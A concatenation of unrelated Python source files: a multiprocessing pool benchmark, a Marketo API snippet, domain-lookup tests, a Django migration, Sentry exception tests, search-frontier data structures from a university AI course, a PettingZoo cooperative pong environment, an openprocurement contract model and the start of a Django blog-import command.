#self.test("imap_done_cb", values)
#self.test("imap_failed_cb", values)
self.test("submit", values)
self.test("submit_pool_done_cb", values)
self.test("submit_pool_failed_cb", values)
self.test("submit_done_cb", values)
print("multiprocessing.pool.Pool:")
#self.test("Pool_map", values)
#self.test("Pool_map_async_done_cb", values)
#self.test("Pool_apply_async_done_cb", values)
print("concurrent.futures.ProcessPoolExecutor:")
#self.test("ProcessPoolExecutor_map", values)
#self.test("ProcessPoolExecutor_submit_done_cb", values)
class TestLists(object):
def __init__(self):
self.result = 0
self.worker = None
self.worker_gen = None
def worker_cb(self, data):
return data
def worker_gen_cb(self, data):
yield data
def failed_cb(self, exc):
print(exc)
def result_cb(self, result):
self.result += sum(result)
def results_cb(self, results):
self.result += sum([ sum(result) for result in results ])
def result_future_cb(self, result):
self.result += sum(result.result())
def map(self, data):
pool = fastprocesspool.Pool()
pool.map(self.worker, data)
pool.shutdown()
self.result = sum([ sum(result) for result in pool.done ])
def map_done_cb(self, data):
pool = fastprocesspool.Pool(done_callback = self.result_cb)
pool.map(self.worker, data)
pool.shutdown()
def map_failed_cb(self, data):
pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
pool.map(self.worker, data)
pool.shutdown()
self.result = sum([ sum(result) for result in pool.done ])
def imap(self, data):
pool = fastprocesspool.Pool()
pool.imap(self.worker_gen, data)
pool.shutdown()
self.result = sum([ sum(result) for result in pool.done ])
def imap_done_cb(self, data):
pool = fastprocesspool.Pool(done_callback = self.result_cb)
pool.imap(self.worker_gen, data)
pool.shutdown()
def imap_failed_cb(self, data):
pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
pool.imap(self.worker_gen, data)
pool.shutdown()
self.result = sum([ sum(result) for result in pool.done ])
def submit(self, data):
pool = fastprocesspool.Pool()
for value in data:
pool.submit(self.worker, value)
pool.shutdown()
self.result = sum([ sum(result) for result in pool.done ])
def submit_done_cb(self, data):
pool = fastprocesspool.Pool(done_callback = self.result_cb)
for value in data:
pool.submit(self.worker, value)
pool.shutdown()
def submit_failed_cb(self, data):
pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
for value in data:
pool.submit(self.worker, value)
pool.shutdown()
self.result = sum([ sum(result) for result in pool.done ])
def Pool_map(self, data):
pool = Pool()
results = pool.map(self.worker, data)
pool.close()
pool.join()
self.result = sum([ sum(result) for result in results ])
def Pool_map_async_done_cb(self, data):
pool = Pool()
pool.map_async(self.worker, data, callback = self.results_cb)
pool.close()
pool.join()
def Pool_apply_async_done_cb(self, data):
pool = Pool()
for value in data:
pool.apply_async(self.worker, ( value, ), callback = self.result_cb)
pool.close()
pool.join()
def ProcessPoolExecutor_map(self, data):
pool = ProcessPoolExecutor()
results = pool.map(self.worker, data)
pool.shutdown()
self.result = sum([ sum(result) for result in results ])
def ProcessPoolExecutor_submit_done_cb(self, data):
pool = ProcessPoolExecutor()
for value in data:
future = pool.submit(self.worker, value)
future.add_done_callback(self.result_future_cb)
pool.shutdown()
def test(self, test_cb, data):
self.result = 0
self.worker = self.worker_cb
self.worker_gen = self.worker_gen_cb
t = time.time()
getattr(self, test_cb)(data)
print("%6.3f %10d %s" % (time.time() - t, self.result, test_cb))
def run(self, n, cnt):
print("\n%d lists with %d values:" % (n, cnt))
v = list(range(cnt))
values = [ v for _ in range(n) ]
self.result = 0
t = time.time()
for value in values:
self.result_cb(self.worker_cb(value))
print("%6.3f %10d single threaded" % (time.time() - t, self.result))
print("fastprocesspool:")
self.test("map", values)
self.test("map_done_cb", values)
self.test("map_failed_cb", values)
self.test("imap", values)
self.test("imap_done_cb", values)
self.test("imap_failed_cb", values)
self.test("submit", values)
self.test("submit_done_cb", values)
self.test("submit_failed_cb", values)
print("multiprocessing.pool.Pool:")
self.test("Pool_map", values)
self.test("Pool_map_async_done_cb", values)
self.test("Pool_apply_async_done_cb", values)
print("concurrent.futures.ProcessPoolExecutor:")
self.test("ProcessPoolExecutor_map", values)
self.test("ProcessPoolExecutor_submit_done_cb", values)
class TestCompress(object):
def __init__(self):
self.result = []
self.worker = None
self.worker_gen = None
def compress_cb(self, data):
return zstd.ZstdCompressor(write_content_size = True, write_checksum = True,
level = 14).compress(data)
def compress_gen_cb(self, data):
yield zstd.ZstdCompressor(write_content_size = True, write_checksum = True,
level = 14).compress(data)
def pack_compress_cb(self, data):
result = zstd.ZstdCompressor(write_content_size = True, write_checksum = True,
level = 14).compress(msgpack.packb(data))
return result
def pack_compress_gen_cb(self, data):
yield zstd.ZstdCompressor(write_content_size = True, write_checksum = True,
level = 14).compress(msgpack.packb(data))
def failed_cb(self, exc):
print(exc)
def result_cb(self, result):
self.result.append(result)
def results_cb(self, results):
self.result.extend(results)
def result_future_cb(self, result):
self.result.append(result.result())
def map(self, data):
pool = fastprocesspool.Pool()
pool.map(self.worker, data)
pool.shutdown()
self.result = list(pool.done)
def map_done_cb(self, data):
pool = fastprocesspool.Pool(done_callback = self.result_cb)
pool.map(self.worker, data)
pool.shutdown()
def map_failed_cb(self, data):
pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
pool.map(self.worker, data)
pool.shutdown()
self.result = list(pool.done)
def imap(self, data):
pool = fastprocesspool.Pool()
pool.imap(self.worker_gen, data)
pool.shutdown()
self.result = list(pool.done)
def imap_done_cb(self, data):
pool = fastprocesspool.Pool(done_callback = self.result_cb)
pool.imap(self.worker_gen, data)
pool.shutdown()
def imap_failed_cb(self, data):
pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
pool.imap(self.worker_gen, data)
pool.shutdown()
self.result = list(pool.done)
def submit(self, data):
pool = fastprocesspool.Pool()
for value in data:
pool.submit(self.worker, value)
pool.shutdown()
self.result = list(pool.done)
def submit_done_cb(self, data):
pool = fastprocesspool.Pool(done_callback = self.result_cb)
for value in data:
pool.submit(self.worker, value)
pool.shutdown()
def submit_failed_cb(self, data):
pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
for value in data:
pool.submit(self.worker, value)
pool.shutdown()
self.result = list(pool.done)
def Pool_map(self, data):
pool = Pool()
results = pool.map(self.worker, data)
pool.close()
pool.join()
self.result = results
def Pool_map_async_done_cb(self, data):
pool = Pool()
pool.map_async(self.worker, data, callback = self.results_cb)
pool.close()
pool.join()
def Pool_apply_async_done_cb(self, data):
pool = Pool()
for value in data:
pool.apply_async(self.worker, ( value, ), callback = self.result_cb)
pool.close()
pool.join()
def ProcessPoolExecutor_map(self, data):
pool = ProcessPoolExecutor()
results = pool.map(self.worker, data)
pool.shutdown()
self.result = list(results)
def ProcessPoolExecutor_submit_done_cb(self, data):
pool = ProcessPoolExecutor()
for value in data:
future = pool.submit(self.worker, value)
future.add_done_callback(self.result_future_cb)
pool.shutdown()
def test_compress(self, test_cb, data):
self.result = []
self.worker = self.compress_cb
self.worker_gen = self.compress_gen_cb
t = time.time()
getattr(self, test_cb)(data)
print("%6.3f %10d %s" % (time.time() - t, len(self.result), test_cb))
def test_pack_compress(self, test_cb, data):
self.result = []
self.worker = self.pack_compress_cb
self.worker_gen = self.pack_compress_gen_cb
t = time.time()
getattr(self, test_cb)(data)
print("%6.3f %10d %s" % (time.time() - t, len(self.result), test_cb))
def run_compress(self, n, cnt):
packed_values = msgpack.packb(list(range(n)))
print("\nCompress %d times %d values:" % (cnt, n))
values = [ packed_values for _ in range(cnt) ]
self.result = []
t = time.time()
for value in values:
self.result_cb(self.compress_cb(value))
print("%6.3f %10d single threaded" % (time.time() - t, len(self.result)))
print("fastprocesspool:")
self.test_compress("map", values)
self.test_compress("map_done_cb", values)
self.test_compress("map_failed_cb", values)
self.test_compress("imap", values)
self.test_compress("imap_done_cb", values)
self.test_compress("imap_failed_cb", values)
self.test_compress("submit", values)
self.test_compress("submit_done_cb", values)
self.test_compress("submit_failed_cb", values)
print("multiprocessing.pool.Pool:")
self.test_compress("Pool_map", values)
self.test_compress("Pool_map_async_done_cb", values)
self.test_compress("Pool_apply_async_done_cb", values)
print("concurrent.futures.ProcessPoolExecutor:")
self.test_compress("ProcessPoolExecutor_map", values)
self.test_compress("ProcessPoolExecutor_submit_done_cb", values)
def run_pack_compress(self, n, cnt):
print("\nPack and compress %d times %d values:" % (cnt, n))
values = [ list(range(n)) for _ in range(cnt) ]
self.result = []
t = time.time()
for value in values:
self.result_cb(self.pack_compress_cb(value))
print("%6.3f %10d single threaded" % (time.time() - t, len(self.result)))
print("fastprocesspool:")
self.test_pack_compress("map", values)
self.test_pack_compress("map_done_cb", values)
self.test_pack_compress("map_failed_cb", values)
self.test_pack_compress("imap", values)
self.test_pack_compress("imap_done_cb", values)
self.test_pack_compress("imap_failed_cb", values)
self.test_pack_compress("submit", values)
self.test_pack_compress("submit_done_cb", values)
self.test_pack_compress("submit_failed_cb", values)
print("multiprocessing.pool.Pool:")
self.test_pack_compress("Pool_map", values)
self.test_pack_compress("Pool_map_async_done_cb", values)
self.test_pack_compress("Pool_apply_async_done_cb", values)
print("concurrent.futures.ProcessPoolExecutor:")
self.test_pack_compress("ProcessPoolExecutor_map", values)
self.test_pack_compress("ProcessPoolExecutor_submit_done_cb", values)
def run(self, n, cnt):
self.run_compress(n, cnt)
self.run_pack_compress(n, cnt)
if __name__ == "__main__":
test = TestValues()
test.run(5)
#test.run(1000000)
#test = TestLists()
#test.run(20000, 10000)
#test = TestCompress()
#test.run(1000, 10000)
|
#input variables to Developer Newsletter Creation Step 13: Get Smart Campaigns
input={
'token': 'Token', #from Step 2: Get Token
'parent id': 'fid', #from Step 3: Get Parent ID or Create Parent Folder
}
import requests
import re
authorization = "Bearer " + input['token']
url = "https://028-jjw-728.mktorest.com//rest/asset/v1/smartCampaigns.json?folder={\"id\":"+ input['program_id']+", \"type\": \"Program\"}"
payload = {}
headers = {
'Authorization': authorization
}
response = requests.request("GET", url, headers=headers, data = payload)
smart_campaigns = re.findall('"id":(\d*),"name":',response.text )
print(response.text)
return {'sc_ids':smart_campaigns}
|
# -*- coding: utf-8 -*-
"""
"""
import pytest
import json
from assassin.lib.helper_functions import validate_ip
from assassin.lib.helper_functions import getDomainInfo
def test_getDomaininfo_com(capsys):
response = getDomainInfo('cnn.com')
temp = json.dumps(response)
json_data = json.loads(temp)
assert 'objectClassName' in json_data
def test_getDomaininfo_net(capsys):
response = getDomainInfo('bitsmasher.net')
temp = json.dumps(response)
json_data = json.loads(temp)
assert 'objectClassName' in json_data
def test_getDomaininfo_net(capsys):
response = getDomainInfo('slashdot.org')
temp = json.dumps(response)
json_data = json.loads(temp)
assert 'objectClassName' in json_data
__author__ = 'Franklin Diaz'
__copyright__ = ''
__credits__ = ['{credit_list}']
__license__ = 'http://www.apache.org/licenses/LICENSE-2.0'
__version__ = ''
__maintainer__ = ''
__email__ = 'fdiaz@paloaltonetworks.com' |
# Generated by Django 3.1.6 on 2021-03-20 10:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0017_auto_20210320_1014'),
]
operations = [
migrations.AddField(
model_name='order',
name='email',
field=models.EmailField(max_length=254, null=True),
),
]
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from exam import fixture
from sentry.interfaces.exception import (
SingleException, Exception, trim_exceptions
)
from sentry.testutils import TestCase
class ExceptionTest(TestCase):
@fixture
def interface(self):
return Exception.to_python(dict(values=[{
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
'stacktrace': {'frames': [{
'filename': 'foo/baz.py',
'lineno': 1,
'in_app': True,
}]},
}, {
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
'stacktrace': {'frames': [{
'filename': 'foo/baz.py',
'lineno': 1,
'in_app': True,
}]},
}]))
def test_path(self):
assert self.interface.get_path() == 'sentry.interfaces.Exception'
def test_args_as_keyword_args(self):
inst = Exception.to_python(dict(values=[{
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
}]))
assert type(inst.values[0]) is SingleException
assert inst.values[0].type == 'ValueError'
assert inst.values[0].value == 'hello world'
assert inst.values[0].module == 'foo.bar'
def test_args_as_old_style(self):
inst = Exception.to_python({
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
})
assert type(inst.values[0]) is SingleException
assert inst.values[0].type == 'ValueError'
assert inst.values[0].value == 'hello world'
assert inst.values[0].module == 'foo.bar'
def test_serialize_unserialize_behavior(self):
result = type(self.interface).to_python(self.interface.to_json())
assert result.to_json() == self.interface.to_json()
def test_to_string(self):
result = self.interface.to_string(self.event)
print result
assert result == """ValueError: hello world
File "foo/baz.py", line 1
ValueError: hello world
File "foo/baz.py", line 1"""
def test_get_hash(self):
inst = self.interface
all_values = sum([v.get_hash() for v in inst.values], [])
assert inst.get_hash() == all_values
def test_context_with_mixed_frames(self):
inst = Exception.to_python(dict(values=[{
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
'stacktrace': {'frames': [{
'filename': 'foo/baz.py',
'lineno': 1,
'in_app': True,
}]},
}, {
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
'stacktrace': {'frames': [{
'filename': 'foo/baz.py',
'lineno': 1,
'in_app': False,
}]},
}]))
self.create_event(data={
'sentry.interfaces.Exception': inst.to_json(),
})
context = inst.get_api_context()
assert context['hasSystemFrames']
def test_context_with_only_system_frames(self):
inst = Exception.to_python(dict(values=[{
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
'stacktrace': {'frames': [{
'filename': 'foo/baz.py',
'lineno': 1,
'in_app': False,
}]},
}, {
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
'stacktrace': {'frames': [{
'filename': 'foo/baz.py',
'lineno': 1,
'in_app': False,
}]},
}]))
self.create_event(data={
'sentry.interfaces.Exception': inst.to_json(),
})
context = inst.get_api_context()
assert not context['hasSystemFrames']
def test_context_with_only_app_frames(self):
inst = Exception.to_python(dict(values=[{
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
'stacktrace': {'frames': [{
'filename': 'foo/baz.py',
'lineno': 1,
'in_app': True,
}]},
}, {
'type': 'ValueError',
'value': 'hello world',
'module': 'foo.bar',
'stacktrace': {'frames': [{
'filename': 'foo/baz.py',
'lineno': 1,
'in_app': True,
}]},
}]))
self.create_event(data={
'sentry.interfaces.Exception': inst.to_json(),
})
context = inst.get_api_context()
assert not context['hasSystemFrames']
class SingleExceptionTest(TestCase):
@fixture
def interface(self):
return SingleException.to_python(dict(
type='ValueError',
value='hello world',
module='foo.bar',
))
def test_serialize_behavior(self):
assert self.interface.to_json() == {
'type': self.interface.type,
'value': self.interface.value,
'module': self.interface.module,
'stacktrace': None,
}
def test_get_hash(self):
assert self.interface.get_hash() == [
self.interface.type,
self.interface.value,
]
def test_get_hash_without_type(self):
self.interface.type = None
assert self.interface.get_hash() == [
self.interface.value,
]
def test_get_hash_without_value(self):
self.interface.value = None
assert self.interface.get_hash() == [
self.interface.type,
]
def test_serialize_unserialize_behavior(self):
result = type(self.interface).to_python(self.interface.to_json())
assert result.to_json() == self.interface.to_json()
def test_only_requires_only_type_or_value(self):
SingleException.to_python(dict(
type='ValueError',
))
SingleException.to_python(dict(
value='ValueError',
))
def test_throws_away_empty_stacktrace(self):
result = SingleException.to_python(dict(
type='ValueError',
value='foo',
stacktrace={'frames': []},
))
assert not result.stacktrace
def test_coerces_object_value_to_string(self):
result = SingleException.to_python(dict(
type='ValueError',
value={'unauthorized': True},
))
assert result.value == '{"unauthorized":true}'
class TrimExceptionsTest(TestCase):
def test_under_max(self):
value = {'values': [{'value': 'foo'}]}
trim_exceptions(value)
assert len(value['values']) == 1
assert value.get('exc_omitted') is None
def test_over_max(self):
values = []
for n in xrange(5):
values.append({'value': 'frame %d' % n})
value = {'values': values}
trim_exceptions(value, max_values=4)
assert len(value['values']) == 4
for value, num in zip(values[:2], xrange(2)):
assert value['value'] == 'frame %d' % num
for value, num in zip(values[2:], xrange(3, 5)):
assert value['value'] == 'frame %d' % num
|
# frontiers.py
# ----------------
# COMP3620/6320 Artificial Intelligence
# The Australian National University
# For full attributions, see attributions.txt on Wattle at the end of the course.
""" This file contains data structures useful for representing search frontiers
for your depth-first, breadth-first, and a-star search algorithms (Q1-3).
You do not have to use these, but it is strongly recommended.
********** YOU SHOULD NOT CHANGE ANYTHING IN THIS FILE **********
"""
import collections
import heapq
class Stack(object):
""" A container with a last-in-first-out (LIFO) queuing policy."""
def __init__(self):
""" Make a new empty Stack.
(Stack) -> None
"""
self.contents = []
def push(self, item):
""" Push item onto the stack.
(Stack, object) -> None
"""
self.contents.append(item)
def pop(self):
""" Pop and return the most recently pushed item from the stack.
(Stack) -> object
"""
return self.contents.pop()
def peek(self):
""" Return the most recently pushed item from the stack.
(Stack) -> object
"""
return self.contents[-1]
def is_empty(self):
""" Returns True if the stack is empty and False otherwise.
(Stack) -> bool
"""
return not self.contents
def find(self, f):
""" Returns some item n from the queue such that f(n) == True and None
if there is no such item.
(Stack, (object) -> object/None) -> object
"""
for elem in self.contents:
if f(elem):
return elem
return None
def __str__(self):
""" Return a string representation of the Stack.
(Stack) -> str
"""
return str(self.contents)
class Queue(object):
""" A container with a first-in-first-out (FIFO) queuing policy.
Its contents are stored in a collections.deque. This allows constant
time insertion and removal of elements at both ends -- whereas a list
is constant time to add or remove elements at the end, but linear
time at the head.
"""
def __init__(self):
""" Make a new empty Queue.
(Queue) -> None
"""
self.contents = collections.deque()
def push(self, item):
""" Enqueue the item into the queue
(Queue, object) -> None
"""
self.contents.append(item)
def pop(self):
""" Dequeue and return the earliest enqueued item still in the queue.
(Queue) -> object
"""
return self.contents.popleft()
def peek(self):
""" Return the earliest enqueued item still in the queue.
(Queue) -> object
"""
return self.contents[0]
def is_empty(self):
""" Returns True if the queue is empty and False otherwise.
(Queue) -> bool
"""
return not self.contents
def find(self, f):
""" Returns some item n from the queue such that f(n) == True and None
if there is no such item.
(Queue, (object) -> object/None) -> object
"""
for elem in self.contents:
if f(elem):
return elem
return None
def __str__(self):
""" Return a string representation of the queue.
(Queue) -> str
"""
return str(list(self.contents))
class PriorityQueue(object):
""" This class implements a priority queue data structure. Each inserted item
has a priority associated with it and we are usually interested in quick
retrieval of the lowest-priority item in the queue. This data structure
allows O(1) access to the lowest-priority item.
"""
def __init__(self):
""" Make a new empty priority queue.
(PriorityQueue) -> None
"""
self.heap = []
self.count = 0
def push(self, item, priority):
""" Enqueue an item to the priority queue with a given priority.
(PriorityQueue, object, number) -> None
"""
heapq.heappush(self.heap, (priority, self.count, item))
self.count += 1
def pop(self):
""" Dequeue and return the item with the lowest priority, breaking ties
in a FIFO order.
(PriorityQueue) -> object
"""
return heapq.heappop(self.heap)[2]
def peek(self):
""" Return the item with the lowest priority, breaking ties in a FIFO order.
(PriorityQueue) -> object
"""
return self.heap[0][2]
def is_empty(self):
""" Returns True if the queue is empty and False otherwise.
(PriorityQueue) -> bool
"""
return not self.heap
def find(self, f):
""" Returns some item n from the queue such that f(n) == True and None
if there is no such item. Note that the parameter `f` is a function.
(PriorityQueue, (object) -> object/None) -> object
"""
for elem in self.heap:
if f(elem[2]):
return elem[2]
return None
def change_priority(self, item, priority):
""" Change the priority of the given item to the specified value. If
the item is not in the queue, a ValueError is raised.
(PriorityQueue, object, int) -> None
"""
for eid, elem in enumerate(self.heap):
if elem[2] == item:
self.heap[eid] = (priority, self.count, item)
self.count += 1
heapq.heapify(self.heap)
return
raise ValueError("Error: " + str(item) +
" is not in the PriorityQueue.")
def __str__(self):
""" Return a string representation of the queue. This will not be in
order.
(PriorityQueue) -> str
"""
return str([x[2] for x in self.heap])
class PriorityQueueWithFunction(PriorityQueue):
""" Implements a priority queue with the same push/pop signature of the
Queue and the Stack classes. This is designed for drop-in replacement for
those two classes. The caller has to provide a priority function, which
extracts each item's priority.
"""
def __init__(self, priority_function):
""" Make a new priority queue with the given priority function.
(PriorityQueueWithFunction, (object) -> number) -> None
"""
super(PriorityQueueWithFunction, self).__init__()
self.priority_function = priority_function
def push(self, item):
"""" Adds an item to the queue with priority from the priority function.
(PriorityQueueWithFunction, object) -> None
"""
heapq.heappush(
self.heap, (self.priority_function(item), self.count, item))
self.count += 1
|
import os
import gym
import numpy as np
import pygame
from gym.utils import EzPickle, seeding
from pettingzoo import AECEnv
from pettingzoo.utils import wrappers
from pettingzoo.utils.agent_selector import agent_selector
from pettingzoo.utils.conversions import parallel_wrapper_fn
from .ball import Ball
from .cake_paddle import CakePaddle
from .paddle import Paddle
FPS = 15
def deg_to_rad(deg):
return deg * np.pi / 180
def get_flat_shape(width, height, kernel_window_length=2):
return int(width * height / (kernel_window_length * kernel_window_length))
def original_obs_shape(screen_width, screen_height, kernel_window_length=2):
return (int(screen_height * 2 / kernel_window_length), int(screen_width * 2 / (kernel_window_length)), 1)
def get_valid_angle(randomizer):
# generates an angle in [0, 2*np.pi) that
# excludes (90 +- ver_deg_range), (270 +- ver_deg_range), (0 +- hor_deg_range), (180 +- hor_deg_range)
# (65, 115), (245, 295), (170, 190), (0, 10), (350, 360)
ver_deg_range = 25
hor_deg_range = 10
a1 = deg_to_rad(90 - ver_deg_range)
b1 = deg_to_rad(90 + ver_deg_range)
a2 = deg_to_rad(270 - ver_deg_range)
b2 = deg_to_rad(270 + ver_deg_range)
c1 = deg_to_rad(180 - hor_deg_range)
d1 = deg_to_rad(180 + hor_deg_range)
c2 = deg_to_rad(360 - hor_deg_range)
d2 = deg_to_rad(0 + hor_deg_range)
angle = 0
while ((angle > a1 and angle < b1) or (angle > a2 and angle < b2) or (angle > c1 and angle < d1) or (angle > c2) or (angle < d2)):
angle = 2 * np.pi * randomizer.rand()
return angle
class CooperativePong:
def __init__(self, randomizer, ball_speed=9, left_paddle_speed=12, right_paddle_speed=12, cake_paddle=True, max_cycles=900, bounce_randomness=False, max_reward=100, off_screen_penalty=-10, render_ratio=2, kernel_window_length=2):
super().__init__()
pygame.init()
self.num_agents = 2
self.render_ratio = render_ratio
self.kernel_window_length = kernel_window_length
# Display screen
self.s_width, self.s_height = 960 // render_ratio, 560 // render_ratio
self.screen = pygame.Surface((self.s_width, self.s_height)) # (960, 720) # (640, 480) # (100, 200)
self.area = self.screen.get_rect()
self.max_reward = max_reward
self.off_screen_penalty = off_screen_penalty
# define action and observation spaces
self.action_space = [gym.spaces.Discrete(3) for _ in range(self.num_agents)]
original_shape = original_obs_shape(self.s_width, self.s_height, kernel_window_length=kernel_window_length)
original_color_shape = (original_shape[0], original_shape[1], 3)
self.observation_space = [gym.spaces.Box(low=0, high=255, shape=(original_color_shape), dtype=np.uint8) for _ in range(self.num_agents)]
# define the global space of the environment or state
self.state_space = gym.spaces.Box(low=0, high=255, shape=((self.s_height, self.s_width, 3)), dtype=np.uint8)
self.renderOn = False
# set speed
self.speed = [ball_speed, left_paddle_speed, right_paddle_speed]
self.max_cycles = max_cycles
# paddles
self.p0 = Paddle((20 // render_ratio, 80 // render_ratio), left_paddle_speed)
if cake_paddle:
self.p1 = CakePaddle(right_paddle_speed, render_ratio=render_ratio)
else:
self.p1 = Paddle((20 // render_ratio, 100 // render_ratio), right_paddle_speed)
self.agents = ["paddle_0", "paddle_1"] # list(range(self.num_agents))
# ball
self.ball = Ball(randomizer, (20 // render_ratio, 20 // render_ratio), ball_speed, bounce_randomness)
self.randomizer = randomizer
self.reinit()
def reinit(self):
self.rewards = dict(zip(self.agents, [0.0] * len(self.agents)))
self.dones = dict(zip(self.agents, [False] * len(self.agents)))
self.infos = dict(zip(self.agents, [{}] * len(self.agents)))
self.score = 0
def reset(self):
# reset ball and paddle init conditions
self.ball.rect.center = self.area.center
# set the direction to an angle between [0, 2*np.pi)
angle = get_valid_angle(self.randomizer)
# angle = deg_to_rad(89)
self.ball.speed = [int(self.ball.speed_val * np.cos(angle)), int(self.ball.speed_val * np.sin(angle))]
self.p0.rect.midleft = self.area.midleft
self.p1.rect.midright = self.area.midright
self.p0.reset()
self.p1.reset()
self.p0.speed = self.speed[1]
self.p1.speed = self.speed[2]
self.done = False
self.num_frames = 0
self.reinit()
self.draw()
def close(self):
if self.renderOn:
pygame.event.pump()
pygame.display.quit()
self.renderOn = False
def enable_render(self):
self.screen = pygame.display.set_mode(self.screen.get_size())
self.renderOn = True
self.draw()
def render(self, mode='human'):
if not self.renderOn and mode == "human":
# sets self.renderOn to true and initializes display
self.enable_render()
observation = np.array(pygame.surfarray.pixels3d(self.screen))
if mode == "human":
pygame.display.flip()
return np.transpose(observation, axes=(1, 0, 2)) if mode == "rgb_array" else None
def observe(self):
observation = np.array(pygame.surfarray.pixels3d(self.screen))
observation = np.rot90(observation, k=3) # now the obs is laid out as H, W as rows and cols
observation = np.fliplr(observation) # laid out in the correct order
return observation
def state(self):
'''
Returns an observation of the global environment
'''
state = pygame.surfarray.pixels3d(self.screen).copy()
state = np.rot90(state, k=3)
state = np.fliplr(state)
return state
def draw(self):
pygame.draw.rect(self.screen, (0, 0, 0), self.area)
self.p0.draw(self.screen)
self.p1.draw(self.screen)
self.ball.draw(self.screen)
def step(self, action, agent):
# update p0, p1 accordingly
# action: 0: do nothing,
# action: 1: p[i] move up
# action: 2: p[i] move down
if agent == self.agents[0]:
self.rewards = {a: 0 for a in self.agents}
self.p0.update(self.area, action)
elif agent == self.agents[1]:
self.p1.update(self.area, action)
# do the rest if not done
if not self.done:
# update ball position
self.done = self.ball.update2(self.area, self.p0, self.p1)
# do the miscellaneous stuff after the last agent has moved
# reward is the length of time ball is in play
reward = 0
# ball is out-of-bounds
if self.done:
reward = self.off_screen_penalty
self.score += reward
if not self.done:
self.num_frames += 1
reward = self.max_reward / self.max_cycles
self.score += reward
if self.num_frames == self.max_cycles:
self.done = True
for ag in self.agents:
self.rewards[ag] = reward
self.dones[ag] = self.done
self.infos[ag] = {}
if self.renderOn:
pygame.event.pump()
self.draw()
def env(**kwargs):
env = raw_env(**kwargs)
env = wrappers.AssertOutOfBoundsWrapper(env)
env = wrappers.OrderEnforcingWrapper(env)
return env
parallel_env = parallel_wrapper_fn(env)
class raw_env(AECEnv, EzPickle):
# class env(MultiAgentEnv):
metadata = {
'render_modes': ['human', "rgb_array"],
'name': "cooperative_pong_v5",
'is_parallelizable': True,
'render_fps': FPS
}
def __init__(self, **kwargs):
EzPickle.__init__(self, **kwargs)
self._kwargs = kwargs
self.seed()
self.agents = self.env.agents[:]
self.possible_agents = self.agents[:]
self._agent_selector = agent_selector(self.agents)
self.agent_selection = self._agent_selector.reset()
# spaces
self.action_spaces = dict(zip(self.agents, self.env.action_space))
self.observation_spaces = dict(zip(self.agents, self.env.observation_space))
self.state_space = self.env.state_space
# dicts
self.observations = {}
self.rewards = self.env.rewards
self.dones = self.env.dones
self.infos = self.env.infos
self.score = self.env.score
def observation_space(self, agent):
return self.observation_spaces[agent]
def action_space(self, agent):
return self.action_spaces[agent]
# def convert_to_dict(self, list_of_list):
# return dict(zip(self.agents, list_of_list))
def seed(self, seed=None):
self.randomizer, seed = seeding.np_random(seed)
self.env = CooperativePong(self.randomizer, **self._kwargs)
def reset(self):
self.env.reset()
self.agents = self.possible_agents[:]
self.agent_selection = self._agent_selector.reset()
self.rewards = self.env.rewards
self._cumulative_rewards = {a: 0 for a in self.agents}
self.dones = self.env.dones
self.infos = self.env.infos
def observe(self, agent):
obs = self.env.observe()
return obs
def state(self):
state = self.env.state()
return state
def close(self):
self.env.close()
def render(self, mode='human'):
return self.env.render(mode)
def step(self, action):
if self.dones[self.agent_selection]:
return self._was_done_step(action)
agent = self.agent_selection
if not self.action_spaces[agent].contains(action):
raise Exception('Action for agent {} must be in Discrete({}).'
'It is currently {}'.format(agent, self.action_spaces[agent].n, action))
self.env.step(action, agent)
# select next agent and observe
self.agent_selection = self._agent_selector.next()
self.rewards = self.env.rewards
self.dones = self.env.dones
self.infos = self.env.infos
self.score = self.env.score
self._cumulative_rewards[agent] = 0
self._accumulate_rewards()
# This was originally created, in full, by Ananth Hari in a different repo, and was
# added in by J K Terry (which is why they're shown as the creator in the git history)
|
# -*- coding: utf-8 -*-
from openprocurement.api.roles import RolesFromCsv
from schematics.exceptions import ValidationError
from schematics.types.compound import ModelType
from schematics.types import StringType
from openprocurement.tender.core.models import ContractValue
from openprocurement.api.utils import get_now
from openprocurement.api.models import Model, ListType, Contract as BaseContract, Document
class Contract(BaseContract):
class Options:
roles = RolesFromCsv("Contract.csv", relative_to=__file__)
value = ModelType(ContractValue)
awardID = StringType(required=True)
documents = ListType(ModelType(Document, required=True), default=list())
def validate_awardID(self, data, awardID):
parent = data["__parent__"]
if awardID and isinstance(parent, Model) and awardID not in [i.id for i in parent.awards]:
raise ValidationError(u"awardID should be one of awards")
def validate_dateSigned(self, data, value):
parent = data["__parent__"]
if value and isinstance(parent, Model) and value > get_now():
raise ValidationError(u"Contract signature date can't be in the future")
|
import os
import re
import glob
import logging
import itertools
import pytz
import requests
from lxml import etree
import html5lib
import markdown
import yaml
from django.conf import settings
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
from django.core.management.base import BaseCommand
from django.db import transaction
from django.contrib.sites.models import Site
from django.contrib.redirects.models import Redirect
from django.utils import translation
from django.utils.dateparse import parse_datetime
from django.utils.text import Truncator
from django.utils.html import strip_tags
from django.core.files.uploadedfile import SimpleUploadedFile
from django.template.defaultfilters import slugify
from cms.models.pluginmodel import CMSPlugin
from cms.api import add_plugin
from filer.models import Image, Folder
from djangocms_text_ckeditor.utils import plugin_to_tag
from djangocms_blog.models import Post
from froide.account.models import User
logger = logging.getLogger(__name__)
YAML_SEPARATOR = '---\n'
NON_SLUG = re.compile(r'[^-\w]')
LIQUID_STRING = re.compile('\{\{\s*["\']([^"\']+)["\']\s*\}\}')
MKD_IMAGE = re.compile(r'!\[(.*?)\]\((.*?)\)')
def clean_content(text):
text = text.replace('<p></p>', '')
text = text.replace('<p> </p>', '')
text = text.replace('<br>', '')
